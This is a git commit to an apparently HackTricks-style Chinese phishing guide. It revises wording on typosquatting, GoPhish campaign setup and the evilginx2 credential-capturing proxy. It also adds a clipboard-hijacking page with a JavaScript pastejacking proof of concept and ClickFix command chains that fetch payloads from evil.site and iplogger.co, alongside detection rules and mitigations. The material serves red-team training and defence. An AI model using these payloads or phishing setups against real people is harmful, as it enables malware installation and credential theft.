Translated ['src/generic-methodologies-and-resources/phishing-methodolog

2025-10-10 18:36:50 +00:00 · 2025-07-16 06:11:07 +00:00 · 2025-07-16 06:11:07 +00:00 · 1b0191feb6
commit 1b0191feb6
parent 1d0e54c9b4
3 changed files with 127 additions and 30 deletions
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@ -28,6 +28,7 @@
  - [Enable Nexmon Monitor And Injection On Android](generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md)
  - [Evil Twin EAP-TLS](generic-methodologies-and-resources/pentesting-wifi/evil-twin-eap-tls.md)
 - [Phishing Methodology](generic-methodologies-and-resources/phishing-methodology/README.md)
+  - [Clipboard Hijacking](generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md)
  - [Clone a Website](generic-methodologies-and-resources/phishing-methodology/clone-a-website.md)
  - [Detecting Phishing](generic-methodologies-and-resources/phishing-methodology/detecting-phising.md)
  - [Discord Invite Hijacking](generic-methodologies-and-resources/phishing-methodology/discord-invite-hijacking.md)
--- a/src/generic-methodologies-and-resources/phishing-methodology/README.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/README.md
@ -29,7 +29,7 @@
 - **单数/复数化**: 在域名末尾添加或删除 “s” (例如，zeltsers.com)。
 - **省略**: 它 **删除域名中的一个字母** (例如，zelser.com)。
 - **重复**: 它 **重复域名中的一个字母** (例如，zeltsser.com)。
- **替换**: 类似于同形异义字，但不那么隐蔽。它替换域名中的一个字母，可能是与原字母在键盘上相邻的字母 (例如，zektser.com)。
+- **替换**: 类似同形异义字但不那么隐蔽。它替换域名中的一个字母，可能是与原字母在键盘上相邻的字母 (例如，zektser.com)。
 - **子域化**: 在域名中引入一个 **点** (例如，ze.lster.com)。
 - **插入**: 它 **在域名中插入一个字母** (例如，zerltser.com)。
 - **缺失点**: 将 TLD 附加到域名上。 (例如，zelstercom.com)
@ -53,7 +53,7 @@

 例如，域名 "windows.com" 中的单个位修改可以将其更改为 "windnws.com"。

-攻击者可能 **利用这一点注册多个位翻转域名**，这些域名与受害者的域名相似。他们的意图是将合法用户重定向到他们自己的基础设施。
+攻击者可能 **利用这一点注册多个位翻转域名**，这些域名与受害者的域名相似。他们的目的是将合法用户重定向到他们自己的基础设施。

 有关更多信息，请阅读 [https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/](https://www.bleepingcomputer.com/news/security/hijacking-traffic-to-microsoft-s-windowscom-with-bitflipping/)

@ -82,7 +82,7 @@

 你可以从 [https://github.com/gophish/gophish/releases/tag/v0.11.0](https://github.com/gophish/gophish/releases/tag/v0.11.0) 下载它。

-下载并解压到 `/opt/gophish` 中并执行 `/opt/gophish/gophish`\
+下载并解压到 `/opt/gophish` 中，并执行 `/opt/gophish/gophish`\
 你将在输出中获得端口 3333 的管理员用户密码。因此，访问该端口并使用这些凭据更改管理员密码。你可能需要将该端口隧道到本地：
 ```bash
 ssh -L 3333:127.0.0.1:3333 <user>@<ip>
@ -124,7 +124,7 @@ cp "/etc/letsencrypt/live/$DOMAIN/fullchain.pem" /opt/gophish/ssl_keys/key.crt

 最后将文件 **`/etc/hostname`** 和 **`/etc/mailname`** 修改为您的域名，并 **重启您的 VPS。**

-现在，创建一个指向 VPS **ip 地址** 的 **DNS A 记录** `mail.<domain>` 和一个指向 `mail.<domain>` 的 **DNS MX 记录**
+现在，创建一个 **DNS A 记录** `mail.<domain>` 指向 **VPS 的 IP 地址**，并创建一个 **DNS MX** 记录指向 `mail.<domain>`

 现在让我们测试发送电子邮件:
 ```bash
@ -208,7 +208,7 @@ case $1 in
 start|stop|status) "$1" ;;
 esac
 ```
-完成配置服务并检查它，方法是：
+完成配置服务并检查它的方法是：
 ```bash
 mkdir /var/log/gophish
 chmod +x /etc/init.d/gophish
@ -257,7 +257,7 @@ v=DMARC1; p=none

 本教程基于：[https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy](https://www.digitalocean.com/community/tutorials/how-to-install-and-configure-dkim-with-postfix-on-debian-wheezy)

-> [!NOTE]
+> [!TIP]
 > 您需要连接DKIM密钥生成的两个B64值：
 >
 > ```
@ -267,7 +267,7 @@ v=DMARC1; p=none
 ### 测试您的电子邮件配置得分

 您可以使用[https://www.mail-tester.com/](https://www.mail-tester.com)\
-只需访问该页面并将电子邮件发送到他们提供的地址：
+只需访问该页面并向他们提供的地址发送电子邮件：
 ```bash
 echo "This is the body of the email" | mail -s "This is the subject line" test-iimosa79z@srv1.mail-tester.com
 ```
@ -283,7 +283,7 @@ DKIM check:         pass
 Sender-ID check:    pass
 SpamAssassin check: ham
 ```
-您还可以向**您控制的Gmail发送消息**，并在您的Gmail收件箱中检查**电子邮件的头部**，`dkim=pass`应出现在`Authentication-Results`头字段中。
+您还可以向**您控制的Gmail发送消息**，并检查您Gmail收件箱中的**电子邮件头**，`dkim=pass`应出现在`Authentication-Results`头字段中。
 ```
 Authentication-Results: mx.google.com;
 spf=pass (google.com: domain of contact@example.com designates --- as permitted sender) smtp.mail=contact@example.com;
@ -291,7 +291,7 @@ dkim=pass header.i=@example.com;
 ```
 ### 从Spamhouse黑名单中移除

-页面 [www.mail-tester.com](https://www.mail-tester.com) 可以指示您的域名是否被spamhouse阻止。您可以在: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/) 请求移除您的域名/IP。
+页面 [www.mail-tester.com](https://www.mail-tester.com) 可以指示您的域名是否被spamhouse阻止。您可以在以下地址请求移除您的域名/IP: [https://www.spamhaus.org/lookup/](https://www.spamhaus.org/lookup/)

 ### 从Microsoft黑名单中移除

@ -305,9 +305,9 @@ dkim=pass header.i=@example.com;
 - 决定您将从哪个账户发送钓鱼邮件。建议：_noreply, support, servicedesk, salesforce..._
 - 您可以将用户名和密码留空，但请确保勾选忽略证书错误

-![](<../../images/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (15) (2).png>)
+![](<../../images/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (15) (2).png>)

-> [!NOTE]
+> [!TIP]
 > 建议使用“**发送测试邮件**”功能来测试一切是否正常。\
 > 我建议将**测试邮件发送到10分钟邮件地址**以避免在测试中被列入黑名单。

@ -335,7 +335,7 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY
 </body>
 </html>
 ```
-注意，**为了提高电子邮件的可信度**，建议使用客户电子邮件中的某些签名。建议：
+请注意，**为了提高电子邮件的可信度**，建议使用客户电子邮件中的某些签名。建议：

 - 向一个**不存在的地址**发送电子邮件，并检查回复是否有任何签名。
 - 搜索**公共电子邮件**，如 info@ex.com 或 press@ex.com 或 public@ex.com，向它们发送电子邮件并等待回复。
@ -343,7 +343,7 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY

 ![](<../../images/image (80).png>)

-> [!NOTE]
+> [!TIP]
 > 电子邮件模板还允许**附加要发送的文件**。如果您还想使用一些特别制作的文件/文档窃取 NTLM 挑战，请[阅读此页面](../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md)。

 ### 登陆页面
@ -355,17 +355,17 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY

 ![](<../../images/image (826).png>)

-> [!NOTE]
+> [!TIP]
 > 通常，您需要修改页面的 HTML 代码并在本地进行一些测试（可能使用某些 Apache 服务器）**直到您满意结果。** 然后，将该 HTML 代码写入框中。\
-> 请注意，如果您需要**使用一些静态资源**用于 HTML（可能是一些 CSS 和 JS 页面），您可以将它们保存在 _**/opt/gophish/static/endpoint**_ 中，然后从 _**/static/\<filename>**_ 访问它们。
+> 请注意，如果您需要**使用某些静态资源**用于 HTML（可能是一些 CSS 和 JS 页面），您可以将它们保存在 _**/opt/gophish/static/endpoint**_ 中，然后从 _**/static/\<filename>**_ 访问它们。

-> [!NOTE]
+> [!TIP]
 > 对于重定向，您可以**将用户重定向到受害者的合法主网页**，或者例如重定向到 _/static/migration.html_，放置一些**旋转轮**（**[https://loading.io/](https://loading.io)**）5 秒钟，然后指示该过程成功。

 ### 用户与组

 - 设置一个名称
- **导入数据**（请注意，为了使用示例的模板，您需要每个用户的名字、姓氏和电子邮件地址）
+- **导入数据**（请注意，为了使用示例模板，您需要每个用户的名字、姓氏和电子邮件地址）

 ![](<../../images/image (163).png>)

@ -373,14 +373,14 @@ WRITE HERE SOME SIGNATURE OF SOMEONE FROM THE COMPANY

 最后，创建一个活动，选择一个名称、电子邮件模板、登陆页面、URL、发送配置文件和组。请注意，URL 将是发送给受害者的链接。

-注意，**发送配置文件允许发送测试电子邮件以查看最终的钓鱼电子邮件的样子**：
+请注意，**发送配置文件允许发送测试电子邮件以查看最终钓鱼电子邮件的外观**：

 ![](<../../images/image (192).png>)

-> [!NOTE]
-> 我建议**将测试电子邮件发送到 10min 邮件地址**以避免在测试中被列入黑名单。
+> [!TIP]
+> 我建议**将测试电子邮件发送到 10 分钟邮件地址**以避免在测试中被列入黑名单。

-一切准备就绪后，启动活动！
+一切准备就绪后，只需启动活动！

 ## 网站克隆

@ -392,7 +392,7 @@ clone-a-website.md

 ## 后门文档和文件

-在某些钓鱼评估中（主要针对红队），您可能还想**发送包含某种后门的文件**（可能是 C2，或者只是一些会触发身份验证的东西）。\
+在某些钓鱼评估中（主要针对红队），您还可能想要**发送包含某种后门的文件**（可能是 C2，或者只是一些会触发身份验证的东西）。\
 查看以下页面以获取一些示例：

 {{#ref}}
@ -403,18 +403,18 @@ phishing-documents.md

 ### 通过代理 MitM

-之前的攻击相当聪明，因为您伪造了一个真实的网站并收集了用户输入的信息。不幸的是，如果用户没有输入正确的密码，或者您伪造的应用程序配置了 2FA，**这些信息将无法让您冒充被欺骗的用户**。
+之前的攻击非常聪明，因为您伪造了一个真实的网站并收集了用户输入的信息。不幸的是，如果用户没有输入正确的密码，或者您伪造的应用程序配置了 2FA，**这些信息将无法让您冒充被欺骗的用户**。

-这就是像 [**evilginx2**](https://github.com/kgretzky/evilginx2)**、** [**CredSniper**](https://github.com/ustayready/CredSniper) 和 [**muraena**](https://github.com/muraenateam/muraena) 这样的工具有用的地方。这个工具将允许您生成类似 MitM 的攻击。基本上，攻击的工作方式如下：
+这就是像 [**evilginx2**](https://github.com/kgretzky/evilginx2)**、** [**CredSniper**](https://github.com/ustayready/CredSniper) 和 [**muraena**](https://github.com/muraenateam/muraena) 这样的工具有用的地方。该工具将允许您生成类似 MitM 的攻击。基本上，攻击的工作方式如下：

 1. 您**冒充真实网页的登录**表单。
 2. 用户**发送**他的**凭据**到您的假页面，工具将这些发送到真实网页，**检查凭据是否有效**。
 3. 如果账户配置了**2FA**，MitM 页面将要求输入，一旦**用户输入**，工具将其发送到真实网页。
-4. 一旦用户通过身份验证，您（作为攻击者）将**捕获凭据、2FA、cookie 和每次交互的任何信息**，同时工具正在执行 MitM。
+4. 一旦用户通过身份验证，您（作为攻击者）将**捕获凭据、2FA、cookie 和任何信息**，在工具执行 MitM 时的每次交互。

 ### 通过 VNC

-如果您不是**将受害者发送到一个与原始页面外观相同的恶意页面**，而是将他发送到一个**与真实网页连接的浏览器的 VNC 会话**，会怎么样？您将能够看到他所做的事情，窃取密码、使用的 MFA、cookie...\
+如果您不是**将受害者发送到一个与原始页面外观相同的恶意页面**，而是将他发送到一个**与真实网页连接的 VNC 会话**呢？您将能够看到他所做的事情，窃取密码、使用的 MFA、cookie...\
 您可以使用 [**EvilnVNC**](https://github.com/JoelGMSec/EvilnoVNC) 来做到这一点。

 ## 检测检测
@ -422,19 +422,27 @@ phishing-documents.md
 显然，知道您是否被发现的最佳方法之一是**在黑名单中搜索您的域**。如果它被列出，您的域以某种方式被检测为可疑。\
 检查您的域是否出现在任何黑名单中的一种简单方法是使用 [https://malwareworld.com/](https://malwareworld.com)。

-然而，还有其他方法可以知道受害者是否**在积极寻找可疑的钓鱼活动**，如以下所述：
+然而，还有其他方法可以知道受害者是否**积极寻找可疑的钓鱼活动**，如以下所述：

 {{#ref}}
 detecting-phising.md
 {{#endref}}

-您可以**购买一个与受害者域名非常相似的域名**，**和/或为您控制的域的**一个**子域生成证书**，**包含**受害者域的**关键字**。如果**受害者**与它们进行任何类型的**DNS 或 HTTP 交互**，您将知道**他在积极寻找**可疑域，您需要非常隐蔽。
+您可以**购买一个与受害者域名非常相似的域名**，**和/或为您控制的域的**子域**生成证书**，**包含**受害者域的**关键字**。如果**受害者**与它们进行任何类型的**DNS 或 HTTP 交互**，您将知道**他在积极寻找**可疑域，您需要非常隐蔽。

 ### 评估钓鱼

-使用 [**Phishious**](https://github.com/Rices/Phishious) 来评估您的电子邮件是否会进入垃圾邮件文件夹，或者是否会被阻止或成功。
+使用 [**Phishious**](https://github.com/Rices/Phishious) 评估您的电子邮件是否会进入垃圾邮件文件夹，或者是否会被阻止或成功。

-## 参考
+## 剪贴板劫持 / 粘贴劫持
+
+攻击者可以在被攻陷或拼写错误的网页上静默地将恶意命令复制到受害者的剪贴板中，然后诱使用户在**Win + R**、**Win + X**或终端窗口中粘贴它们，从而执行任意代码，而无需任何下载或附件。
+
+{{#ref}}
+clipboard-hijacking.md
+{{#endref}}
+
+## 参考文献

 - [https://zeltser.com/domain-name-variations-in-phishing/](https://zeltser.com/domain-name-variations-in-phishing/)
 - [https://0xpatrik.com/phishing-domains/](https://0xpatrik.com/phishing-domains/)
--- a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
+++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md
@ -0,0 +1,88 @@
+# Clipboard Hijacking (Pastejacking) Attacks
+
+{{#include ../../banners/hacktricks-training.md}}
+
+> "永远不要粘贴你没有自己复制的内容。" – 虽然老旧但仍然有效的建议
+
+## Overview
+
+Clipboard hijacking – 也称为 *pastejacking* – 利用用户常常在不检查的情况下复制和粘贴命令的事实。一个恶意网页（或任何支持JavaScript的环境，如Electron或桌面应用程序）以编程方式将攻击者控制的文本放入系统剪贴板。受害者通常通过精心设计的社会工程指令被鼓励按下 **Win + R**（运行对话框）、**Win + X**（快速访问/PowerShell），或打开终端并 *粘贴* 剪贴板内容，立即执行任意命令。
+
+因为 **没有文件被下载，也没有附件被打开**，该技术绕过了大多数监控附件、宏或直接命令执行的电子邮件和网页内容安全控制。因此，该攻击在传播商品恶意软件家族（如NetSupport RAT、Latrodectus loader或Lumma Stealer）的网络钓鱼活动中非常流行。
+
+## JavaScript Proof-of-Concept
+```html
+<!-- Any user interaction (click) is enough to grant clipboard write permission in modern browsers -->
+<button id="fix" onclick="copyPayload()">Fix the error</button>
+<script>
+function copyPayload() {
+const payload = `powershell -nop -w hidden -enc <BASE64-PS1>`; // hidden PowerShell one-liner
+navigator.clipboard.writeText(payload)
+.then(() => alert('Now press  Win+R , paste and hit Enter to fix the problem.'));
+}
+</script>
+```
+较早的攻击使用 `document.execCommand('copy')`，而较新的攻击依赖于异步 **Clipboard API** (`navigator.clipboard.writeText`)。
+
+## ClickFix / ClearFake 流程
+
+1. 用户访问一个拼写错误或被攻陷的网站（例如 `docusign.sa[.]com`）
+2. 注入的 **ClearFake** JavaScript 调用一个 `unsecuredCopyToClipboard()` 辅助函数，静默地将一个 Base64 编码的 PowerShell 单行命令存储在剪贴板中。
+3. HTML 指示告诉受害者：“按 **Win + R**，粘贴命令并按 Enter 以解决问题。”
+4. `powershell.exe` 执行，下载一个包含合法可执行文件和恶意 DLL 的压缩包（经典的 DLL 侧载）。
+5. 加载程序解密额外阶段，注入 shellcode 并安装持久性（例如计划任务）——最终运行 NetSupport RAT / Latrodectus / Lumma Stealer。
+
+### 示例 NetSupport RAT 链接
+```powershell
+powershell -nop -w hidden -enc <Base64>
+# ↓ Decodes to:
+Invoke-WebRequest -Uri https://evil.site/f.zip -OutFile %TEMP%\f.zip ;
+Expand-Archive %TEMP%\f.zip -DestinationPath %TEMP%\f ;
+%TEMP%\f\jp2launcher.exe             # Sideloads msvcp140.dll
+```
+* `jp2launcher.exe` (合法的 Java WebStart) 在其目录中搜索 `msvcp140.dll`。
+* 恶意 DLL 动态解析 API 使用 **GetProcAddress**，通过 **curl.exe** 下载两个二进制文件 (`data_3.bin`, `data_4.bin`)，使用滚动 XOR 密钥 `"https://google.com/"` 解密它们，注入最终的 shellcode 并将 **client32.exe** (NetSupport RAT) 解压到 `C:\ProgramData\SecurityCheck_v1\`。
+
+### Latrodectus Loader
+```
+powershell -nop -enc <Base64>  # Cloud Identificator: 2031
+```
+1. 使用 **curl.exe** 下载 `la.txt`
+2. 在 **cscript.exe** 中执行 JScript 下载器
+3. 获取 MSI 有效载荷 → 在签名应用程序旁边放置 `libcef.dll` → DLL 侧载 → shellcode → Latrodectus。
+
+### 通过 MSHTA 的 Lumma Stealer
+```
+mshta https://iplogger.co/xxxx =+\\xxx
+```
+**mshta** 调用启动一个隐藏的 PowerShell 脚本，该脚本检索 `PartyContinued.exe`，提取 `Boat.pst` (CAB)，通过 `extrac32` 和文件连接重建 `AutoIt3.exe`，最后运行一个 `.a3x` 脚本，该脚本将浏览器凭据外泄到 `sumeriavgv.digital`。
+
+## 检测与狩猎
+
+蓝队可以结合剪贴板、进程创建和注册表遥测来定位粘贴劫持滥用：
+
+* Windows 注册表：`HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` 保留 **Win + R** 命令的历史记录 – 查找不寻常的 Base64 / 混淆条目。
+* 安全事件 ID **4688** (进程创建)，其中 `ParentImage` == `explorer.exe` 且 `NewProcessName` 在 { `powershell.exe`, `wscript.exe`, `mshta.exe`, `curl.exe`, `cmd.exe` } 中。
+* 事件 ID **4663** 用于在可疑的 4688 事件之前创建的 `%LocalAppData%\Microsoft\Windows\WinX\` 或临时文件夹下的文件。
+* EDR 剪贴板传感器（如果存在） – 关联 `Clipboard Write` 紧接着一个新的 PowerShell 进程。
+
+## 缓解措施
+
+1. 浏览器强化 – 禁用剪贴板写入访问 (`dom.events.asyncClipboard.clipboardItem` 等) 或要求用户手势。
+2. 安全意识 – 教用户 *输入* 敏感命令或先将其粘贴到文本编辑器中。
+3. PowerShell 受限语言模式 / 执行策略 + 应用程序控制以阻止任意单行命令。
+4. 网络控制 – 阻止对已知粘贴劫持和恶意软件 C2 域的出站请求。
+
+## 相关技巧
+
+* **Discord 邀请劫持** 通常在诱使用户进入恶意服务器后滥用相同的 ClickFix 方法：
+{{#ref}}
+discord-invite-hijacking.md
+{{#endref}}
+
+## 参考文献
+
+- [Fix the Click: Preventing the ClickFix Attack Vector](https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/)
+- [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking)
+
+{{#include ../../banners/hacktricks-training.md}}